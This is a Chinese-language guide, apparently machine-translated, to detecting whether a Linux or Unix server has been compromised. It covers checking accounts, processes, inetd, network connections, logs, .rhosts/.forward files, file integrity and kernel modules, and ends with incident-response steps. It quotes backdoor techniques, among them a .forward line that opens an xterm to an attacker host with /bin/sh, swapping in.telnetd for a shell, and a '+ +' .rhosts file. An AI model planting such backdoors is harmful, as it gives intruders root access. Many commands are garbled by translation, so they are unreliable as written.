Linux怎么知道自己的服务器有没有被黑?
1。检查系统密码文件。
从最明显的开始,检查passwd文件,ls–l/etc/passwd检查文件修改的日期。
检查passwd文件中有哪些特权用户,系统中所有uid为0的用户都会显示出来。
一个
awk–F:’ $ 3 = = 0 { print $ 1 } ‘/etc/passwd
顺便查一下系统里有没有空密码账号:
一个
awk–F:’ length $ 2)= = 0 { print $ 1 } ‘/etc/shadow
2.检查流程,看看有没有什么奇怪的流程。
关注观看过程:ps -aef
grep inetd
Inetd是UNIX系统的守护进程,普通inetd的pid更高。如果你看到像iNet D–s/tmp/这样的进程。xxx输出,重点是iNet D–s之后的内容,一般情况下,LINUX系统中的iNet D服务后面没有-s参数,当然也没有使用inetd来启动一个文件;在solaris系统中,只有inetd–s,没有启动特定文件的inetd。如果你用ps命令看到inetd启动了一个文件,但是你自己没有用inetd启动文件,那就说明有人入侵了你的系统,充当了一个简单的root权限的后门。
输入ps -aef查看输出信息,特别要注意是否有任何以。/xxx。一旦发现奇怪的进程,在检查完为入侵者留下的后门程序后,立即运行kill -9 pid杀死该进程,然后运行ps -aef查看该进程是否被杀死;这种进程一旦被杀死然后重启,就证明自动启动程序的脚本已经放在系统里了。这时候仔细看:find/-name程序名–- print,假设系统真的是被入侵者设置的,根据找到的程序所在的目录,你会发现很多有趣的东西j。
有时候UNIX下的隐藏进程是通过替换ps文件来完成的。这种方法包括检查文件的完整性。我们将在后面讨论这个方法。
接下来,根据在服务器上找到的入侵者的文件目录,对其进行逐步跟踪。
3.检查系统守护程序。
检查文件/etc/inetd.conf,输入:cat/etc/inetd . conf
grep–v“#”。输出信息是您的机器打开的远程服务。
一般入侵者可以通过直接替换in.xxx程序来创建后门,比如用/bin/sh替换in.telnetd,然后重启inetd服务。然后,所有telnet到服务器的用户将直接获得一个rootshell,无需输入用户名和密码。
4.检查网络连接和监控端口。
进入netstat -an,列出本机的所有连接和监听端口,检查是否有非法连接。
输入netstat -rn检查该机器的路由和网关设置是否正确。
输入ifconfig–a查看网卡设置。
5.检查系统日志。
命令last
more查看正常情况下登录到该机器的所有用户的历史记录。但是,最后一个命令依赖于syslog进程,这已经成为入侵者的重要目标。入侵者通常会停止系统的syslog,检查系统的syslog进程状态,判断syslog最后一次启动是否正常,因为syslog是以root身份执行的。如果发现syslog被非法移动,说明存在重大入侵事件。
在linux下输入ls–al/var/log。
在solaris下输入ls–al/var/ADM。
检查wtmp utmp的完整性和修改时间,包括消息等。这也是一种手动清除入侵痕迹的方法。
6.检查系统中的核心文件。
通过发送畸形的请求来攻击服务器的服务是一种常规的入侵方法,典型的RPC攻击就是这样。这种方法有一定的成功率,也就是说不能保证100%成功入侵系统,而且一般是在服务器的相应目录下生成核心文件,全局搜索系统中的核心文件,输入find/-name core-exec ls-l { } ;根据核心所在的目录,查询核心文件,判断是否有入侵。
7,.rhosts和。向前
这是两个众所周知的后门文件。如果您想检查您的系统是否被入侵者进行了后门安装,您也可以在全局范围内查找这两个文件:
查找/-名称”。rhosts”-打印
查找/-名称”。向前”——打印
在用户的$HOME下,非常危险的是。rhosts文件只包含两个
号。如果您的系统有端口513 (rlogin端口,其功能与telnet相同),那么任何人都可以使用该用户登录您的系统,而无需任何验证。
如果您想做深入的安全加固服务和安全部署,请点击这里
需要找专业的服务器安全公司来处理。在国内,信安、绿盟更专业。
在Unix下,将命令放在。转发文件是重新获得访问权限常用方法。的。用户的$HOME下的forward可设置如下:
用户名
& quot/usr/local/X11/bin/xterm-disp hack sys . other . DOM:0.0–e/bin/sh & quot;
这种方法的变体包括更改系统邮件的别名文件(通常位于/etc/aliases中)。请注意,这只是一个简单的转换。更高级的可以运行简单的脚本。forward在标准输入上执行任意命令(经过少量预处理)。使用smrsh可以有效阻止这个后门(虽然elm & # 39如果允许,它可以自己运行;s或procmail类程序,可能有问题。在Solaris系统下,如果运行以下命令:
ln -s /var/mail/luser ~/。向前
然后将vacation设置为有效,那么/var/mail/luser将被复制到~/。转发,并将同时附上“。
/usr/bin/vacation me & quot;,旧的符号链接被移到~/。向前..后援。
你可以删除这两个文件。
8.检查系统文件的完整性。
有许多方法可以检查文件的完整性。通常,我们通过输入LS–L文件名来查询和比较文件。这种方法虽然简单,但还是有一定的实用性。但是如果所有的ls文件都被替换了,那就麻烦了。在LINUX下,可以使用RPM–v ` RPM–QF文件名`来查询。全国查询结果是否正常,可以判断档案是否完整。LINUX下使用rpm检查文件完整性的方法有很多,这里就不赘述了。man rpm可以用来获得更多的格式。
在UNIX系统中,/bin/login是一个经常被入侵者替换为后门的文件。接下来,我们来说说登录后门:
在UNIX中,登录程序通常用于验证telnet用户的密码。入侵者获取登录的源代码并进行修改,使其在比较输入密码和存储密码时首先检查后门密码。如果用户键入后门密码,它会忽略管理员设置的密码,让你直接开进去:这将允许入侵者进入任何帐户,甚至是根目录。由于后门密码是在用户实际登录并登录utmp和wtmP之前生成的访问,入侵者可以在不暴露账户的情况下登录获取外壳。管理员注意到这个后门后,使用“strings”命令在登录程序中搜索文本信息。在很多情况下,后门密码会自己暴露。入侵者将开始加密或更改隐藏的密码,这将使字符串命令无效。所以很多管理员用MD5校验和来检测这个后门。UNIX系统中有md5sum命令。输入文件名md5sum以检查文件的md5签名。其使用格式如下:m D5 sum–B使用二进制模式读取文件;MD5 sum–c反向检查MD5签名;m D5 sum–t使用文本读取文件。
如上所述,守护进程应该与守护进程配置文件inetd.conf中未注释的行仔细比较,举个简单的例子,如果你打开telnet服务,守护进程配置文件中会有一句话:telnet stream TCP nowaitroot/usr/sbin/in . telnetdin . telnetd。
可以看到它使用的文件是/usr /usr/sbin/in.telnetd检查这个文件的完整性。入侵者通常通过替换守护进程中允许的服务文件来为自己创建后门。
LINUX系统中的/etc/crontab也是入侵者经常使用的文件。要检查这个文件的完整性,可以直接cat /etc/crontab,仔细读取这个文件是否被入侵者用来做其他事情。
直接使用进程启动后门而不替换登录文件的方法有一个缺陷,就是一旦系统重启,进程就会被杀死,所以系统启动时必须启动后门。通常检查/etc/rc.d下的文件,看系统是否启动了后门程序;这个方法怎么有点像windows下的查找木马?
说到这,顺便说一句,如果现有的属性是某个目录下的这样一个文件:-rwsr-xr-x1rootxxx.sh,这表示任何进来后运行这个文件的用户都可以得到一个rootshell,也就是setuid文件。运行find–perm 4000–print以全局查找此类文件,然后删除此类文件。
9.检查内核级后门。
如果你的系统安装了这种后门,通常会很烦。我经常想,在这种情况下,我最好重装系统。让我们言归正传。首先检查系统加载的模块,在LINUX下使用lsmod命令,在solaris下使用modinfo命令。这里需要注意的是,默认安装的LINUX加载的模块一般很少,通常是网卡的驱动;在solaris下,有很多,没有别的办法,只能一个一个分析。内核加固后,禁止插入或删除模块,以保护系统的安全,否则入侵者可能再次替换系统调用。我们可以通过替换create_module()和delete_module()来做到这一点。另外,要尽快加固内核,防止系统调用被入侵者替代。如果系统加载了后门模块,但是在模块列表/proc/module中看不到,可能是hack工具已经被用来移除加载的模块了,知名的knark toolkit就有移除加载模块的工具。在这种情况下,需要仔细搜索/proc目录,根据找到的文件和经验判断隐藏和伪装的进程。Knark后门模块位于/proc/knark目录中。当然,这个目录可能是隐藏的。
服务器被木马攻击怎么办?
如果服务器(网站)被入侵或木马攻击了,一般都是服务器或者网站存在漏洞,被黑客利用并提权入侵的,导致服务器中木马,网站被挂黑链,被篡改,被挂马。解决办法:如果程序不是很大,可以自己比对以前程序的备份文件
web服务器被入侵后操作正确的是?
修改服务内容为目的的系统入侵,基本可以不需要停机就可改完成系统恢复工作:
1、建立被入侵系统当前完整系统快照,或只保存被修改部分的快照,以便事后分析和留作证据。
2、立即通过备份恢复被修改的网页。
3、在Windows系统下,通过网络监控软件或“netstat -an”命令来查看系统目前的网络连接情况,如果发现不正常的网络连接,应当立即断开与它的连接。然后通过查看系统进程、服务和分析系统和服务的日志文件,来检查系统攻击者在系统中还做了什么样的操作,以便做相应的恢复。
4、通过分析系统日志文件,或者通过弱点检测工具来了解攻击者入侵系统所利用的漏洞。如果攻击者是利用系统或网络应用程序的漏洞来入侵系统的,那么,就应当寻找相应的系统或应用程序漏洞补丁来修补它,如果目前还没有这些漏洞的相关补丁,我们就应当使用其它的手段来暂时防范再次利用这些漏洞的入侵活动。如果攻击者是利用其它方式,例如社会工程方式入侵系统的,而检查系统中不存在新的漏洞,那么就可以不必做这一个步骤,而必需对社会工程攻击实施的对象进行了解和培训。
5、修复系统或应用程序漏洞后,还应当添加相应的防火墙规则来防止此类事件的再次发生,如果安装有IDS/IPS和杀毒软件,还应当升级它们的特征库。
6、较后,使用系统或相应的应用程序检测软件对系统或服务进行快速有效的弱点检测,在检测之前要其检测特征库是较新的。所有工作完成后,还应当在后续的一段时间内,安排专人对此系统进行实时监控,以确信系统已经不会再次被此类入侵事件攻击。